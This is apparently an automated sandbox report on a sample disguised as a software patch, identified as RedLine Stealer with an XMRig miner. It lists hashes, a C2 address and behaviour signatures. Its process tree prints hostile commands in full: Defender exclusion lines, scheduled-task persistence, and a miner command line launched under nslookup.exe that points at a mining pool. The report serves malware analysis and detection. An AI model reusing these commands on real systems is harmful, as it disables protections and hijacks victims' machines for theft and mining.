Analysis
-
max time kernel
151s -
max time network
139s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
21-10-2021 13:52
Static task
static1
Behavioral task
behavioral1
Sample
Software patch by Sylox.exe
Resource
win7-en-20210920
General
-
Target
Software patch by Sylox.exe
-
Size
3.2MB
-
MD5
32da7dfc115619bf8a6197ec22b75edf
-
SHA1
6118bde049e88592ff92464788c63992a96ece13
-
SHA256
ea152bfedb88c978ab9730ab0f6c9f4baed1777e33d5a6e25c3d542b5c39bb61
-
SHA512
c2a522312fe8bcbe092c6dd46e6e34c53e0d9bf58bccea1f9de1e96b06c0f08d452e0c000a46f34b1cc5bbe22df866243edd17450c1a2ddf43854ddba26864a1
Malware Config
Extracted
redline
@faqu_1
95.181.152.6:46927
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1828-136-0x0000000000470000-0x000000000049E000-memory.dmp family_redline behavioral2/memory/1828-142-0x0000000000A60000-0x0000000000A79000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4220-491-0x000000014030F3F8-mapping.dmp xmrig behavioral2/memory/4220-496-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
Processes:
Datafile32.exeDatafile64.exeServer32.exeservices32.exeservices64.exesihost32.exesihost64.exepid process 4060 Datafile32.exe 3196 Datafile64.exe 1828 Server32.exe 1412 services32.exe 2228 services64.exe 584 sihost32.exe 5044 sihost64.exe -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
services32.exeSoftware patch by Sylox.exeDatafile32.exeservices64.exeDatafile64.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion services32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion services32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Software patch by Sylox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Datafile32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Datafile32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion services64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion services64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Software patch by Sylox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Datafile64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Datafile64.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/4392-118-0x0000000000FA0000-0x0000000000FA1000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\Datafile32.exe themida C:\Users\Admin\AppData\Local\Temp\Datafile32.exe themida behavioral2/memory/4060-125-0x0000000000400000-0x0000000000E48000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida behavioral2/memory/3196-133-0x0000000000400000-0x0000000000EAE000-memory.dmp themida C:\Windows\System32\services32.exe themida C:\Windows\system32\services32.exe themida C:\Windows\System32\services64.exe themida C:\Windows\system32\services64.exe themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Software patch by Sylox.exeDatafile32.exeDatafile64.exeservices32.exeservices64.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Software patch by Sylox.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Datafile32.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Datafile64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA services32.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA services64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 7 IoCs
Processes:
conhost.execonhost.execonhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\services32.exe conhost.exe File created C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\system32\services64.exe conhost.exe File created C:\Windows\system32\Microsoft\Telemetry\sihost32.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe File created C:\Windows\system32\services32.exe conhost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
Software patch by Sylox.exeDatafile32.exeDatafile64.exeservices32.exeservices64.exepid process 4392 Software patch by Sylox.exe 4060 Datafile32.exe 3196 Datafile64.exe 1412 services32.exe 2228 services64.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 2036 set thread context of 4220 2036 conhost.exe nslookup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3212 schtasks.exe 4788 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Server32.execonhost.exepowershell.execonhost.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.execonhost.exepowershell.exepowershell.exenslookup.exepowershell.exepid process 1828 Server32.exe 1352 conhost.exe 2272 powershell.exe 2272 powershell.exe 2272 powershell.exe 4712 conhost.exe 4144 powershell.exe 4144 powershell.exe 4144 powershell.exe 2412 powershell.exe 2412 powershell.exe 2904 powershell.exe 2412 powershell.exe 2904 powershell.exe 2904 powershell.exe 4080 conhost.exe 4080 conhost.exe 3208 powershell.exe 3208 powershell.exe 3208 powershell.exe 2036 conhost.exe 2036 conhost.exe 4320 powershell.exe 4320 powershell.exe 4320 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4220 nslookup.exe 4220 nslookup.exe 1524 powershell.exe 1524 powershell.exe 1524 powershell.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe 4220 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Software patch by Sylox.exeServer32.execonhost.exepowershell.execonhost.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4392 Software patch by Sylox.exe Token: SeDebugPrivilege 1828 Server32.exe Token: SeDebugPrivilege 1352 conhost.exe Token: SeDebugPrivilege 2272 powershell.exe Token: SeDebugPrivilege 4712 conhost.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeIncreaseQuotaPrivilege 2272 powershell.exe Token: SeSecurityPrivilege 2272 powershell.exe Token: SeTakeOwnershipPrivilege 2272 powershell.exe Token: SeLoadDriverPrivilege 2272 powershell.exe Token: SeSystemProfilePrivilege 2272 powershell.exe Token: SeSystemtimePrivilege 2272 powershell.exe Token: SeProfSingleProcessPrivilege 2272 powershell.exe Token: SeIncBasePriorityPrivilege 2272 powershell.exe Token: SeCreatePagefilePrivilege 2272 powershell.exe Token: SeBackupPrivilege 2272 powershell.exe Token: SeRestorePrivilege 2272 powershell.exe Token: SeShutdownPrivilege 2272 powershell.exe Token: SeDebugPrivilege 2272 powershell.exe Token: SeSystemEnvironmentPrivilege 2272 powershell.exe Token: SeRemoteShutdownPrivilege 2272 powershell.exe Token: SeUndockPrivilege 2272 powershell.exe Token: SeManageVolumePrivilege 2272 powershell.exe Token: 33 2272 powershell.exe Token: 34 2272 powershell.exe Token: 35 2272 powershell.exe Token: 36 2272 powershell.exe Token: SeIncreaseQuotaPrivilege 4144 powershell.exe Token: SeSecurityPrivilege 4144 powershell.exe Token: SeTakeOwnershipPrivilege 4144 powershell.exe Token: SeLoadDriverPrivilege 4144 powershell.exe Token: SeSystemProfilePrivilege 4144 powershell.exe Token: SeSystemtimePrivilege 4144 powershell.exe Token: SeProfSingleProcessPrivilege 4144 powershell.exe Token: SeIncBasePriorityPrivilege 4144 powershell.exe Token: SeCreatePagefilePrivilege 4144 powershell.exe Token: SeBackupPrivilege 4144 powershell.exe Token: SeRestorePrivilege 4144 powershell.exe Token: SeShutdownPrivilege 4144 powershell.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeSystemEnvironmentPrivilege 4144 powershell.exe Token: SeRemoteShutdownPrivilege 4144 powershell.exe Token: SeUndockPrivilege 4144 powershell.exe Token: SeManageVolumePrivilege 4144 powershell.exe Token: 33 4144 powershell.exe Token: 34 4144 powershell.exe Token: 35 4144 powershell.exe Token: 36 4144 powershell.exe Token: SeDebugPrivilege 2412 powershell.exe Token: SeDebugPrivilege 2904 powershell.exe Token: SeIncreaseQuotaPrivilege 2412 powershell.exe Token: SeSecurityPrivilege 2412 powershell.exe Token: SeTakeOwnershipPrivilege 2412 powershell.exe Token: SeLoadDriverPrivilege 2412 powershell.exe Token: SeSystemProfilePrivilege 2412 powershell.exe Token: SeSystemtimePrivilege 2412 powershell.exe Token: SeProfSingleProcessPrivilege 2412 powershell.exe Token: SeIncBasePriorityPrivilege 2412 powershell.exe Token: SeCreatePagefilePrivilege 2412 powershell.exe Token: SeBackupPrivilege 2412 powershell.exe Token: SeRestorePrivilege 2412 powershell.exe Token: SeShutdownPrivilege 2412 powershell.exe Token: SeDebugPrivilege 2412 powershell.exe Token: SeSystemEnvironmentPrivilege 2412 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Software patch by Sylox.exeDatafile32.execonhost.execmd.execmd.exeDatafile64.execonhost.execmd.execmd.execmd.execmd.exeservices32.execonhost.execmd.exeservices64.execonhost.execmd.exedescription pid process target process PID 4392 wrote to memory of 4060 4392 Software patch by Sylox.exe Datafile32.exe PID 4392 wrote to memory of 4060 4392 Software patch by Sylox.exe Datafile32.exe PID 4392 wrote to memory of 3196 4392 Software patch by Sylox.exe Datafile64.exe PID 4392 wrote to memory of 3196 4392 Software patch by Sylox.exe Datafile64.exe PID 4392 wrote to memory of 1828 4392 Software patch by Sylox.exe Server32.exe PID 4392 wrote to memory of 1828 4392 Software patch by Sylox.exe Server32.exe PID 4392 wrote to memory of 1828 4392 Software patch by Sylox.exe Server32.exe PID 4060 wrote to memory of 1352 4060 Datafile32.exe conhost.exe PID 4060 wrote to memory of 1352 4060 Datafile32.exe conhost.exe PID 4060 wrote to memory of 1352 4060 Datafile32.exe conhost.exe PID 1352 wrote to memory of 1912 1352 conhost.exe cmd.exe PID 1352 wrote to memory of 1912 1352 conhost.exe cmd.exe PID 1912 wrote to memory of 2272 1912 cmd.exe powershell.exe PID 1912 wrote to memory of 2272 1912 cmd.exe powershell.exe PID 1352 wrote to memory of 2836 1352 conhost.exe cmd.exe PID 1352 wrote to memory of 2836 1352 conhost.exe cmd.exe PID 2836 wrote to memory of 3212 2836 cmd.exe schtasks.exe PID 2836 wrote to memory of 3212 2836 cmd.exe schtasks.exe PID 3196 wrote to memory of 4712 3196 Datafile64.exe conhost.exe PID 3196 wrote to memory of 4712 3196 Datafile64.exe conhost.exe PID 3196 wrote to memory of 4712 3196 Datafile64.exe conhost.exe PID 4712 wrote to memory of 4968 4712 conhost.exe cmd.exe PID 4712 wrote to memory of 4968 4712 conhost.exe cmd.exe PID 4968 wrote to memory of 4144 4968 cmd.exe powershell.exe PID 4968 wrote to memory of 4144 4968 cmd.exe powershell.exe PID 4712 wrote to memory of 2312 4712 conhost.exe cmd.exe PID 4712 wrote to memory of 2312 4712 conhost.exe cmd.exe PID 2312 wrote to memory of 4788 2312 cmd.exe schtasks.exe PID 2312 wrote to memory of 4788 2312 cmd.exe schtasks.exe PID 4968 wrote to memory of 2412 4968 cmd.exe powershell.exe PID 4968 wrote to memory of 2412 4968 cmd.exe powershell.exe PID 1912 wrote to memory of 2904 1912 cmd.exe powershell.exe PID 1912 wrote to memory of 2904 1912 cmd.exe powershell.exe PID 1352 wrote to memory of 3252 1352 conhost.exe cmd.exe PID 1352 wrote to memory of 3252 1352 conhost.exe cmd.exe PID 3252 wrote to memory of 1412 3252 cmd.exe services32.exe PID 3252 wrote to memory of 1412 3252 cmd.exe services32.exe PID 4712 wrote to memory of 1056 4712 conhost.exe cmd.exe PID 4712 wrote to memory of 1056 4712 conhost.exe cmd.exe PID 1056 wrote to memory of 2228 1056 cmd.exe services64.exe PID 1056 wrote to memory of 2228 1056 cmd.exe services64.exe PID 1412 wrote to memory of 4080 1412 services32.exe conhost.exe PID 1412 wrote to memory of 4080 1412 services32.exe conhost.exe PID 1412 wrote to memory of 4080 1412 services32.exe conhost.exe PID 4080 wrote to memory of 3812 4080 conhost.exe cmd.exe PID 4080 wrote to memory of 3812 4080 conhost.exe cmd.exe PID 3812 wrote to memory of 3208 3812 cmd.exe powershell.exe PID 3812 wrote to memory of 3208 3812 cmd.exe powershell.exe PID 4080 wrote to memory of 584 4080 conhost.exe sihost32.exe PID 4080 wrote to memory of 584 4080 conhost.exe sihost32.exe PID 2228 wrote to memory of 2036 2228 services64.exe conhost.exe PID 2228 wrote to memory of 2036 2228 services64.exe conhost.exe PID 2228 wrote to memory of 2036 2228 services64.exe conhost.exe PID 2036 wrote to memory of 2884 2036 conhost.exe cmd.exe PID 2036 wrote to memory of 2884 2036 conhost.exe cmd.exe PID 2884 wrote to memory of 4320 2884 cmd.exe powershell.exe PID 2884 wrote to memory of 4320 2884 cmd.exe powershell.exe PID 2036 wrote to memory of 5044 2036 conhost.exe sihost64.exe PID 2036 wrote to memory of 5044 2036 conhost.exe sihost64.exe PID 2036 wrote to memory of 4220 2036 conhost.exe nslookup.exe PID 2036 wrote to memory of 4220 2036 conhost.exe nslookup.exe PID 2036 wrote to memory of 4220 2036 conhost.exe nslookup.exe PID 2036 wrote to memory of 4220 2036 conhost.exe nslookup.exe PID 2036 wrote to memory of 4220 2036 conhost.exe nslookup.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software patch by Sylox.exe"C:\Users\Admin\AppData\Local\Temp\Software patch by Sylox.exe"1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services32.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\services32.exeC:\Windows\system32\services32.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost32"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"6⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"8⤵
-
C:\Windows\System32\nslookup.exeC:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/HLOYsB6MqZ9V7F19H0MAEc0HL5dHX6oXKZkVMPa+PCA=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth7⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Server32.exe"C:\Users\Admin\AppData\Local\Temp\Server32.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logMD5
84f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
2e79205ad8e536fc7e0e3a7773fee633
SHA197efa275e68ad655fbb351fc7b4069942abbdc1f
SHA2569e6ce47fa2134f9d30e0fb2a14ebce579f42739ad18754bdd4b1f8f56916c49d
SHA512a1077ed09ccf7d67d17fb9b64ff1e7ed44bc2247fb308a13f69745a1376d07d35390e86712fee45975d0d2136e112e4cb17a638f104cf1443b7ea6f802efa68b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
2e79205ad8e536fc7e0e3a7773fee633
SHA197efa275e68ad655fbb351fc7b4069942abbdc1f
SHA2569e6ce47fa2134f9d30e0fb2a14ebce579f42739ad18754bdd4b1f8f56916c49d
SHA512a1077ed09ccf7d67d17fb9b64ff1e7ed44bc2247fb308a13f69745a1376d07d35390e86712fee45975d0d2136e112e4cb17a638f104cf1443b7ea6f802efa68b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
faaf56b67c1a4d4c6724298dcea194ea
SHA13b75b94f8cdf9387d1ebe5d65d35d88d0714eca4
SHA256831e2a0bb602bf63e987bd97d2a9441fc603d37b6ca6dc0c1e4cd5caf0fa7db9
SHA512a40797225c42069aaa9ba32f6639f45d601a965376f9f086252e5775e39d4a237a95d7463e17e09e2c15a45468046a8fa141272853eb4214151019e175d5d6fd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
faaf56b67c1a4d4c6724298dcea194ea
SHA13b75b94f8cdf9387d1ebe5d65d35d88d0714eca4
SHA256831e2a0bb602bf63e987bd97d2a9441fc603d37b6ca6dc0c1e4cd5caf0fa7db9
SHA512a40797225c42069aaa9ba32f6639f45d601a965376f9f086252e5775e39d4a237a95d7463e17e09e2c15a45468046a8fa141272853eb4214151019e175d5d6fd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
6105eea50af09939b404a054877c79f3
SHA19cb05a55f6ad8ed42a86470a3a7ccee9fd028a85
SHA2566852786762610acffad3ef8b9deff8f57362859d2f362f88daa1c8604edf3072
SHA512f38d6e9a80af7ded583ea2e9479e9915facbd9de39962a6c822a4bd6cd5a153aae07a8d94d55c3b47486c2ec3cdf2a6e34df624740de3b0f9974c085a55d4ada
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
